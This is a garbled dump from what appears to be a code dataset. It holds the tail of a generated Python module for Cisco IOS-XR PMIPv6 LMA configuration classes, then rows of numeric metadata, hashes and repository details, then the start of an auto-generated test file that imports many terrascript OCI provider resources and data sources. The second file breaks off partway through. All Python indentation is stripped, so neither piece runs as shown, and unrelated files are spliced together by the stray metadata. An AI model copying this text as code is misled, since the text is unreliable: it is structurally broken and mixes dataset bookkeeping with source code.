super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer', (YLeaf(YType.str, 'peer'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('encap', (YLeaf(YType.enumeration, 'encap'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Encap', '')])),
('auth', (YLeaf(YType.boolean, 'auth'), ['bool'])),
('vrf', (YLeaf(YType.boolean, 'vrf'), ['bool'])),
('statictunnel', (YLeaf(YType.boolean, 'statictunnel'), ['bool'])),
])
self.peer = None
self.vrf_name = None
self.interface = None
self.encap = None
self.auth = None
self.vrf = None
self.statictunnel = None
self._segment_path = lambda: "peer"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer, ['peer', 'vrf_name', 'interface', 'encap', 'auth', 'vrf', 'statictunnel'], name, value)
class Network(Entity):
"""
LMA Network Parameters
.. attribute:: v4pool
IPV4 pool Present
**type**\: bool
.. attribute:: v6pool
IPV6 pool Present
**type**\: bool
.. attribute:: network
Network Name
**type**\: str
.. attribute:: ipv4
IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6
IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: v4pfx_len
v4 prefix len
**type**\: int
**range:** 0..255
.. attribute:: v6pfx_len
v6 prefix len
**type**\: int
**range:** 0..255
.. attribute:: mrnet
num of mrnet
**type**\: int
**range:** 0..255
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('v4pool', (YLeaf(YType.boolean, 'v4pool'), ['bool'])),
('v6pool', (YLeaf(YType.boolean, 'v6pool'), ['bool'])),
('network', (YLeaf(YType.str, 'network'), ['str'])),
('ipv4', (YLeaf(YType.str, 'ipv4'), ['str'])),
('ipv6', (YLeaf(YType.str, 'ipv6'), ['str'])),
('v4pfx_len', (YLeaf(YType.uint8, 'v4pfx-len'), ['int'])),
('v6pfx_len', (YLeaf(YType.uint8, 'v6pfx-len'), ['int'])),
('mrnet', (YLeaf(YType.uint8, 'mrnet'), ['int'])),
])
self.v4pool = None
self.v6pool = None
self.network = None
self.ipv4 = None
self.ipv6 = None
self.v4pfx_len = None
self.v6pfx_len = None
self.mrnet = None
self._segment_path = lambda: "network"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Network, ['v4pool', 'v6pool', 'network', 'ipv4', 'ipv6', 'v4pfx_len', 'v6pfx_len', 'mrnet'], name, value)
class Cust(Entity):
"""
Customer parameters
.. attribute:: cust
Customer Present
**type**\: bool
.. attribute:: vrf
Customer VRF Present
**type**\: bool
.. attribute:: t_vrf
Transport VRF Present
**type**\: bool
.. attribute:: auth_option
Authentication Option
**type**\: bool
.. attribute:: heart_beat
HeartBeat Option
**type**\: bool
.. attribute:: reg_time
BCE Registration Lifetime
**type**\: int
**range:** 0..4294967295
.. attribute:: cust_name
CUSTOMER Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: t_vrf_name
Transport VRF Name
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust, self).__init__()
self.yang_name = "cust"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cust', (YLeaf(YType.boolean, 'cust'), ['bool'])),
('vrf', (YLeaf(YType.boolean, 'vrf'), ['bool'])),
('t_vrf', (YLeaf(YType.boolean, 't-vrf'), ['bool'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
('heart_beat', (YLeaf(YType.boolean, 'heart-beat'), ['bool'])),
('reg_time', (YLeaf(YType.uint32, 'reg-time'), ['int'])),
('cust_name', (YLeaf(YType.str, 'cust-name'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('t_vrf_name', (YLeaf(YType.str, 't-vrf-name'), ['str'])),
])
self.cust = None
self.vrf = None
self.t_vrf = None
self.auth_option = None
self.heart_beat = None
self.reg_time = None
self.cust_name = None
self.vrf_name = None
self.t_vrf_name = None
self._segment_path = lambda: "cust"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust, ['cust', 'vrf', 't_vrf', 'auth_option', 'heart_beat', 'reg_time', 'cust_name', 'vrf_name', 't_vrf_name'], name, value)
def clone_ptr(self):
self._top_entity = Pmipv6()
return self._top_entity
| 50.7622
| 984
| 0.421741
| 22,714
| 294,370
| 5.19182
| 0.020428
| 0.028628
| 0.033173
| 0.035937
| 0.882758
| 0.854308
| 0.831158
| 0.814784
| 0.806753
| 0.793567
| 0
| 0.041174
| 0.479064
| 294,370
| 5,798
| 985
| 50.770956
| 0.727841
| 0.235938
| 0
| 0.708682
| 0
| 0.012552
| 0.208969
| 0.110132
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054916
| false
| 0
| 0.002615
| 0
| 0.099372
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe230d64c86f08076ff21742bf942a3f535b2541
| 83,841
|
py
|
Python
|
tests/test_provider_hashicorp_oci.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_hashicorp_oci.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_hashicorp_oci.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_hashicorp_oci.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:14 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.oci
def test_resource_import():
from terrascript.resource.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_data_asset
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_model
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_project
from terrascript.resource.hashicorp.oci import oci_analytics_analytics_instance
from terrascript.resource.hashicorp.oci import (
oci_analytics_analytics_instance_private_access_channel,
)
from terrascript.resource.hashicorp.oci import (
oci_analytics_analytics_instance_vanity_url,
)
from terrascript.resource.hashicorp.oci import oci_apigateway_api
from terrascript.resource.hashicorp.oci import oci_apigateway_certificate
from terrascript.resource.hashicorp.oci import oci_apigateway_deployment
from terrascript.resource.hashicorp.oci import oci_apigateway_gateway
from terrascript.resource.hashicorp.oci import oci_apm_apm_domain
from terrascript.resource.hashicorp.oci import oci_apm_synthetics_monitor
from terrascript.resource.hashicorp.oci import oci_apm_synthetics_script
from terrascript.resource.hashicorp.oci import oci_artifacts_container_configuration
from terrascript.resource.hashicorp.oci import (
oci_artifacts_container_image_signature,
)
from terrascript.resource.hashicorp.oci import oci_artifacts_container_repository
from terrascript.resource.hashicorp.oci import oci_artifacts_generic_artifact
from terrascript.resource.hashicorp.oci import oci_artifacts_repository
from terrascript.resource.hashicorp.oci import oci_audit_configuration
from terrascript.resource.hashicorp.oci import (
oci_autoscaling_auto_scaling_configuration,
)
from terrascript.resource.hashicorp.oci import oci_bastion_bastion
from terrascript.resource.hashicorp.oci import oci_bastion_session
from terrascript.resource.hashicorp.oci import oci_bds_auto_scaling_configuration
from terrascript.resource.hashicorp.oci import oci_bds_bds_instance
from terrascript.resource.hashicorp.oci import oci_blockchain_blockchain_platform
from terrascript.resource.hashicorp.oci import oci_blockchain_osn
from terrascript.resource.hashicorp.oci import oci_blockchain_peer
from terrascript.resource.hashicorp.oci import oci_budget_alert_rule
from terrascript.resource.hashicorp.oci import oci_budget_budget
from terrascript.resource.hashicorp.oci import (
oci_cloud_guard_cloud_guard_configuration,
)
from terrascript.resource.hashicorp.oci import oci_cloud_guard_data_mask_rule
from terrascript.resource.hashicorp.oci import oci_cloud_guard_detector_recipe
from terrascript.resource.hashicorp.oci import oci_cloud_guard_managed_list
from terrascript.resource.hashicorp.oci import oci_cloud_guard_responder_recipe
from terrascript.resource.hashicorp.oci import oci_cloud_guard_target
from terrascript.resource.hashicorp.oci import oci_containerengine_cluster
from terrascript.resource.hashicorp.oci import oci_containerengine_node_pool
from terrascript.resource.hashicorp.oci import (
oci_core_app_catalog_listing_resource_version_agreement,
)
from terrascript.resource.hashicorp.oci import oci_core_app_catalog_subscription
from terrascript.resource.hashicorp.oci import oci_core_boot_volume
from terrascript.resource.hashicorp.oci import oci_core_boot_volume_backup
from terrascript.resource.hashicorp.oci import oci_core_cluster_network
from terrascript.resource.hashicorp.oci import oci_core_compute_capacity_reservation
from terrascript.resource.hashicorp.oci import (
oci_core_compute_image_capability_schema,
)
from terrascript.resource.hashicorp.oci import oci_core_console_history
from terrascript.resource.hashicorp.oci import oci_core_cpe
from terrascript.resource.hashicorp.oci import oci_core_cross_connect
from terrascript.resource.hashicorp.oci import oci_core_cross_connect_group
from terrascript.resource.hashicorp.oci import oci_core_dedicated_vm_host
from terrascript.resource.hashicorp.oci import oci_core_default_dhcp_options
from terrascript.resource.hashicorp.oci import oci_core_default_route_table
from terrascript.resource.hashicorp.oci import oci_core_default_security_list
from terrascript.resource.hashicorp.oci import oci_core_dhcp_options
from terrascript.resource.hashicorp.oci import oci_core_drg
from terrascript.resource.hashicorp.oci import oci_core_drg_attachment
from terrascript.resource.hashicorp.oci import oci_core_drg_attachment_management
from terrascript.resource.hashicorp.oci import oci_core_drg_attachments_list
from terrascript.resource.hashicorp.oci import oci_core_drg_route_distribution
from terrascript.resource.hashicorp.oci import (
oci_core_drg_route_distribution_statement,
)
from terrascript.resource.hashicorp.oci import oci_core_drg_route_table
from terrascript.resource.hashicorp.oci import oci_core_drg_route_table_route_rule
from terrascript.resource.hashicorp.oci import oci_core_image
from terrascript.resource.hashicorp.oci import oci_core_instance
from terrascript.resource.hashicorp.oci import oci_core_instance_configuration
from terrascript.resource.hashicorp.oci import oci_core_instance_console_connection
from terrascript.resource.hashicorp.oci import oci_core_instance_pool
from terrascript.resource.hashicorp.oci import oci_core_instance_pool_instance
from terrascript.resource.hashicorp.oci import oci_core_internet_gateway
from terrascript.resource.hashicorp.oci import oci_core_ipsec
from terrascript.resource.hashicorp.oci import (
oci_core_ipsec_connection_tunnel_management,
)
from terrascript.resource.hashicorp.oci import oci_core_ipv6
from terrascript.resource.hashicorp.oci import (
oci_core_listing_resource_version_agreement,
)
from terrascript.resource.hashicorp.oci import oci_core_local_peering_gateway
from terrascript.resource.hashicorp.oci import oci_core_nat_gateway
from terrascript.resource.hashicorp.oci import oci_core_network_security_group
from terrascript.resource.hashicorp.oci import (
oci_core_network_security_group_security_rule,
)
from terrascript.resource.hashicorp.oci import oci_core_private_ip
from terrascript.resource.hashicorp.oci import oci_core_public_ip
from terrascript.resource.hashicorp.oci import oci_core_public_ip_pool
from terrascript.resource.hashicorp.oci import oci_core_public_ip_pool_capacity
from terrascript.resource.hashicorp.oci import oci_core_remote_peering_connection
from terrascript.resource.hashicorp.oci import oci_core_route_table
from terrascript.resource.hashicorp.oci import oci_core_route_table_attachment
from terrascript.resource.hashicorp.oci import oci_core_security_list
from terrascript.resource.hashicorp.oci import oci_core_service_gateway
from terrascript.resource.hashicorp.oci import oci_core_shape_management
from terrascript.resource.hashicorp.oci import oci_core_subnet
from terrascript.resource.hashicorp.oci import oci_core_vcn
from terrascript.resource.hashicorp.oci import oci_core_virtual_circuit
from terrascript.resource.hashicorp.oci import oci_core_virtual_network
from terrascript.resource.hashicorp.oci import oci_core_vlan
from terrascript.resource.hashicorp.oci import oci_core_vnic_attachment
from terrascript.resource.hashicorp.oci import oci_core_volume
from terrascript.resource.hashicorp.oci import oci_core_volume_attachment
from terrascript.resource.hashicorp.oci import oci_core_volume_backup
from terrascript.resource.hashicorp.oci import oci_core_volume_backup_policy
from terrascript.resource.hashicorp.oci import (
oci_core_volume_backup_policy_assignment,
)
from terrascript.resource.hashicorp.oci import oci_core_volume_group
from terrascript.resource.hashicorp.oci import oci_core_volume_group_backup
from terrascript.resource.hashicorp.oci import oci_data_safe_data_safe_configuration
from terrascript.resource.hashicorp.oci import (
oci_data_safe_data_safe_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_data_safe_on_prem_connector
from terrascript.resource.hashicorp.oci import oci_data_safe_target_database
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_association_operation,
)
from terrascript.resource.hashicorp.oci import oci_database_autonomous_database
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_backup,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_instance_wallet_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_regional_wallet_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_wallet,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure,
)
from terrascript.resource.hashicorp.oci import oci_database_autonomous_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_backup
from terrascript.resource.hashicorp.oci import oci_database_backup_destination
from terrascript.resource.hashicorp.oci import (
oci_database_cloud_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_cloud_exadata_infrastructure,
)
from terrascript.resource.hashicorp.oci import oci_database_cloud_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_data_guard_association
from terrascript.resource.hashicorp.oci import oci_database_database
from terrascript.resource.hashicorp.oci import oci_database_database_software_image
from terrascript.resource.hashicorp.oci import oci_database_database_upgrade
from terrascript.resource.hashicorp.oci import oci_database_db_home
from terrascript.resource.hashicorp.oci import (
oci_database_db_node_console_connection,
)
from terrascript.resource.hashicorp.oci import oci_database_db_system
from terrascript.resource.hashicorp.oci import oci_database_exadata_infrastructure
from terrascript.resource.hashicorp.oci import (
oci_database_exadata_infrastructure_storage,
)
from terrascript.resource.hashicorp.oci import oci_database_exadata_iorm_config
from terrascript.resource.hashicorp.oci import (
oci_database_external_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_container_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_database_connector,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database_operations_insights_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database_operations_insights_management,
)
from terrascript.resource.hashicorp.oci import oci_database_key_store
from terrascript.resource.hashicorp.oci import oci_database_maintenance_run
from terrascript.resource.hashicorp.oci import (
oci_database_management_db_management_private_endpoint,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_database_group,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_databases_change_database_parameter,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_databases_reset_database_parameter,
)
from terrascript.resource.hashicorp.oci import oci_database_migration
from terrascript.resource.hashicorp.oci import oci_database_migration_agent
from terrascript.resource.hashicorp.oci import oci_database_migration_connection
from terrascript.resource.hashicorp.oci import oci_database_migration_job
from terrascript.resource.hashicorp.oci import oci_database_migration_migration
from terrascript.resource.hashicorp.oci import oci_database_pluggable_database
from terrascript.resource.hashicorp.oci import (
oci_database_pluggable_databases_local_clone,
)
from terrascript.resource.hashicorp.oci import (
oci_database_pluggable_databases_remote_clone,
)
from terrascript.resource.hashicorp.oci import oci_database_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_vm_cluster_network
from terrascript.resource.hashicorp.oci import oci_datacatalog_catalog
from terrascript.resource.hashicorp.oci import (
oci_datacatalog_catalog_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_datacatalog_connection
from terrascript.resource.hashicorp.oci import oci_datacatalog_data_asset
from terrascript.resource.hashicorp.oci import oci_datacatalog_metastore
from terrascript.resource.hashicorp.oci import oci_dataflow_application
from terrascript.resource.hashicorp.oci import oci_dataflow_invoke_run
from terrascript.resource.hashicorp.oci import oci_dataflow_private_endpoint
from terrascript.resource.hashicorp.oci import oci_dataintegration_workspace
from terrascript.resource.hashicorp.oci import oci_datascience_job
from terrascript.resource.hashicorp.oci import oci_datascience_job_run
from terrascript.resource.hashicorp.oci import oci_datascience_model
from terrascript.resource.hashicorp.oci import oci_datascience_model_deployment
from terrascript.resource.hashicorp.oci import oci_datascience_model_provenance
from terrascript.resource.hashicorp.oci import oci_datascience_notebook_session
from terrascript.resource.hashicorp.oci import oci_datascience_project
from terrascript.resource.hashicorp.oci import oci_devops_deploy_artifact
from terrascript.resource.hashicorp.oci import oci_devops_deploy_environment
from terrascript.resource.hashicorp.oci import oci_devops_deploy_pipeline
from terrascript.resource.hashicorp.oci import oci_devops_deploy_stage
from terrascript.resource.hashicorp.oci import oci_devops_deployment
from terrascript.resource.hashicorp.oci import oci_devops_project
from terrascript.resource.hashicorp.oci import oci_dns_record
from terrascript.resource.hashicorp.oci import oci_dns_resolver
from terrascript.resource.hashicorp.oci import oci_dns_resolver_endpoint
from terrascript.resource.hashicorp.oci import oci_dns_rrset
from terrascript.resource.hashicorp.oci import oci_dns_steering_policy
from terrascript.resource.hashicorp.oci import oci_dns_steering_policy_attachment
from terrascript.resource.hashicorp.oci import oci_dns_tsig_key
from terrascript.resource.hashicorp.oci import oci_dns_view
from terrascript.resource.hashicorp.oci import oci_dns_zone
from terrascript.resource.hashicorp.oci import oci_email_dkim
from terrascript.resource.hashicorp.oci import oci_email_email_domain
from terrascript.resource.hashicorp.oci import oci_email_sender
from terrascript.resource.hashicorp.oci import oci_email_suppression
from terrascript.resource.hashicorp.oci import oci_events_rule
from terrascript.resource.hashicorp.oci import oci_file_storage_export
from terrascript.resource.hashicorp.oci import oci_file_storage_export_set
from terrascript.resource.hashicorp.oci import oci_file_storage_file_system
from terrascript.resource.hashicorp.oci import oci_file_storage_mount_target
from terrascript.resource.hashicorp.oci import oci_file_storage_snapshot
from terrascript.resource.hashicorp.oci import oci_functions_application
from terrascript.resource.hashicorp.oci import oci_functions_function
from terrascript.resource.hashicorp.oci import oci_functions_invoke_function
from terrascript.resource.hashicorp.oci import (
oci_generic_artifacts_content_artifact_by_path,
)
from terrascript.resource.hashicorp.oci import oci_golden_gate_database_registration
from terrascript.resource.hashicorp.oci import oci_golden_gate_deployment
from terrascript.resource.hashicorp.oci import oci_golden_gate_deployment_backup
from terrascript.resource.hashicorp.oci import oci_health_checks_http_monitor
from terrascript.resource.hashicorp.oci import oci_health_checks_http_probe
from terrascript.resource.hashicorp.oci import oci_health_checks_ping_monitor
from terrascript.resource.hashicorp.oci import oci_health_checks_ping_probe
from terrascript.resource.hashicorp.oci import oci_identity_api_key
from terrascript.resource.hashicorp.oci import oci_identity_auth_token
from terrascript.resource.hashicorp.oci import oci_identity_authentication_policy
from terrascript.resource.hashicorp.oci import oci_identity_compartment
from terrascript.resource.hashicorp.oci import oci_identity_customer_secret_key
from terrascript.resource.hashicorp.oci import oci_identity_dynamic_group
from terrascript.resource.hashicorp.oci import oci_identity_group
from terrascript.resource.hashicorp.oci import oci_identity_identity_provider
from terrascript.resource.hashicorp.oci import oci_identity_idp_group_mapping
from terrascript.resource.hashicorp.oci import oci_identity_network_source
from terrascript.resource.hashicorp.oci import oci_identity_policy
from terrascript.resource.hashicorp.oci import oci_identity_smtp_credential
from terrascript.resource.hashicorp.oci import oci_identity_swift_password
from terrascript.resource.hashicorp.oci import oci_identity_tag
from terrascript.resource.hashicorp.oci import oci_identity_tag_default
from terrascript.resource.hashicorp.oci import oci_identity_tag_namespace
from terrascript.resource.hashicorp.oci import oci_identity_ui_password
from terrascript.resource.hashicorp.oci import oci_identity_user
from terrascript.resource.hashicorp.oci import (
oci_identity_user_capabilities_management,
)
from terrascript.resource.hashicorp.oci import oci_identity_user_group_membership
from terrascript.resource.hashicorp.oci import oci_integration_integration_instance
from terrascript.resource.hashicorp.oci import oci_jms_fleet
from terrascript.resource.hashicorp.oci import oci_kms_encrypted_data
from terrascript.resource.hashicorp.oci import oci_kms_generated_key
from terrascript.resource.hashicorp.oci import oci_kms_key
from terrascript.resource.hashicorp.oci import oci_kms_key_version
from terrascript.resource.hashicorp.oci import oci_kms_sign
from terrascript.resource.hashicorp.oci import oci_kms_vault
from terrascript.resource.hashicorp.oci import oci_kms_vault_replication
from terrascript.resource.hashicorp.oci import oci_kms_verify
from terrascript.resource.hashicorp.oci import oci_limits_quota
from terrascript.resource.hashicorp.oci import oci_load_balancer
from terrascript.resource.hashicorp.oci import oci_load_balancer_backend
from terrascript.resource.hashicorp.oci import oci_load_balancer_backend_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_backendset
from terrascript.resource.hashicorp.oci import oci_load_balancer_certificate
from terrascript.resource.hashicorp.oci import oci_load_balancer_hostname
from terrascript.resource.hashicorp.oci import oci_load_balancer_listener
from terrascript.resource.hashicorp.oci import oci_load_balancer_load_balancer
from terrascript.resource.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policy,
)
from terrascript.resource.hashicorp.oci import oci_load_balancer_path_route_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_rule_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_ssl_cipher_suite
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_entity,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_import_custom_content,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_log_group,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rule,
)
from terrascript.resource.hashicorp.oci import oci_log_analytics_namespace
from terrascript.resource.hashicorp.oci import oci_logging_log
from terrascript.resource.hashicorp.oci import oci_logging_log_group
from terrascript.resource.hashicorp.oci import oci_logging_log_saved_search
from terrascript.resource.hashicorp.oci import (
oci_logging_unified_agent_configuration,
)
from terrascript.resource.hashicorp.oci import oci_management_agent_management_agent
from terrascript.resource.hashicorp.oci import (
oci_management_agent_management_agent_install_key,
)
from terrascript.resource.hashicorp.oci import (
oci_management_dashboard_management_dashboards_import,
)
from terrascript.resource.hashicorp.oci import oci_marketplace_accepted_agreement
from terrascript.resource.hashicorp.oci import (
oci_marketplace_listing_package_agreement,
)
from terrascript.resource.hashicorp.oci import oci_marketplace_publication
from terrascript.resource.hashicorp.oci import oci_metering_computation_custom_table
from terrascript.resource.hashicorp.oci import oci_metering_computation_query
from terrascript.resource.hashicorp.oci import oci_metering_computation_usage
from terrascript.resource.hashicorp.oci import oci_monitoring_alarm
from terrascript.resource.hashicorp.oci import oci_mysql_analytics_cluster
from terrascript.resource.hashicorp.oci import oci_mysql_channel
from terrascript.resource.hashicorp.oci import oci_mysql_heat_wave_cluster
from terrascript.resource.hashicorp.oci import oci_mysql_mysql_backup
from terrascript.resource.hashicorp.oci import oci_mysql_mysql_db_system
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_backend
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_backend_set
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_listener
from terrascript.resource.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer,
)
from terrascript.resource.hashicorp.oci import oci_nosql_index
from terrascript.resource.hashicorp.oci import oci_nosql_table
from terrascript.resource.hashicorp.oci import oci_objectstorage_bucket
from terrascript.resource.hashicorp.oci import oci_objectstorage_namespace_metadata
from terrascript.resource.hashicorp.oci import oci_objectstorage_object
from terrascript.resource.hashicorp.oci import (
oci_objectstorage_object_lifecycle_policy,
)
from terrascript.resource.hashicorp.oci import oci_objectstorage_preauthrequest
from terrascript.resource.hashicorp.oci import oci_objectstorage_replication_policy
from terrascript.resource.hashicorp.oci import oci_oce_oce_instance
from terrascript.resource.hashicorp.oci import oci_ocvp_esxi_host
from terrascript.resource.hashicorp.oci import oci_ocvp_sddc
from terrascript.resource.hashicorp.oci import oci_oda_oda_instance
from terrascript.resource.hashicorp.oci import oci_ons_notification_topic
from terrascript.resource.hashicorp.oci import oci_ons_subscription
from terrascript.resource.hashicorp.oci import oci_opsi_database_insight
from terrascript.resource.hashicorp.oci import oci_opsi_enterprise_manager_bridge
from terrascript.resource.hashicorp.oci import oci_opsi_host_insight
from terrascript.resource.hashicorp.oci import oci_optimizer_enrollment_status
from terrascript.resource.hashicorp.oci import oci_optimizer_profile
from terrascript.resource.hashicorp.oci import oci_optimizer_recommendation
from terrascript.resource.hashicorp.oci import oci_optimizer_resource_action
from terrascript.resource.hashicorp.oci import oci_osmanagement_managed_instance
from terrascript.resource.hashicorp.oci import (
oci_osmanagement_managed_instance_group,
)
from terrascript.resource.hashicorp.oci import (
oci_osmanagement_managed_instance_management,
)
from terrascript.resource.hashicorp.oci import oci_osmanagement_software_source
from terrascript.resource.hashicorp.oci import oci_sch_service_connector
from terrascript.resource.hashicorp.oci import (
oci_service_catalog_private_application,
)
from terrascript.resource.hashicorp.oci import oci_service_catalog_service_catalog
from terrascript.resource.hashicorp.oci import (
oci_service_catalog_service_catalog_association,
)
from terrascript.resource.hashicorp.oci import oci_streaming_connect_harness
from terrascript.resource.hashicorp.oci import oci_streaming_stream
from terrascript.resource.hashicorp.oci import oci_streaming_stream_pool
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipe,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_target,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipe,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_target,
)
from terrascript.resource.hashicorp.oci import oci_waas_address_list
from terrascript.resource.hashicorp.oci import oci_waas_certificate
from terrascript.resource.hashicorp.oci import oci_waas_custom_protection_rule
from terrascript.resource.hashicorp.oci import oci_waas_http_redirect
from terrascript.resource.hashicorp.oci import oci_waas_protection_rule
from terrascript.resource.hashicorp.oci import oci_waas_purge_cache
from terrascript.resource.hashicorp.oci import oci_waas_waas_policy
def test_datasource_import():
from terrascript.data.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoint,
)
from terrascript.data.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoints,
)
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_data_asset
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_data_assets
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_model
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_models
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_project
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_projects
from terrascript.data.hashicorp.oci import oci_analytics_analytics_instance
from terrascript.data.hashicorp.oci import (
oci_analytics_analytics_instance_private_access_channel,
)
from terrascript.data.hashicorp.oci import oci_analytics_analytics_instances
from terrascript.data.hashicorp.oci import oci_apigateway_api
from terrascript.data.hashicorp.oci import oci_apigateway_api_content
from terrascript.data.hashicorp.oci import (
oci_apigateway_api_deployment_specification,
)
from terrascript.data.hashicorp.oci import oci_apigateway_api_validation
from terrascript.data.hashicorp.oci import oci_apigateway_apis
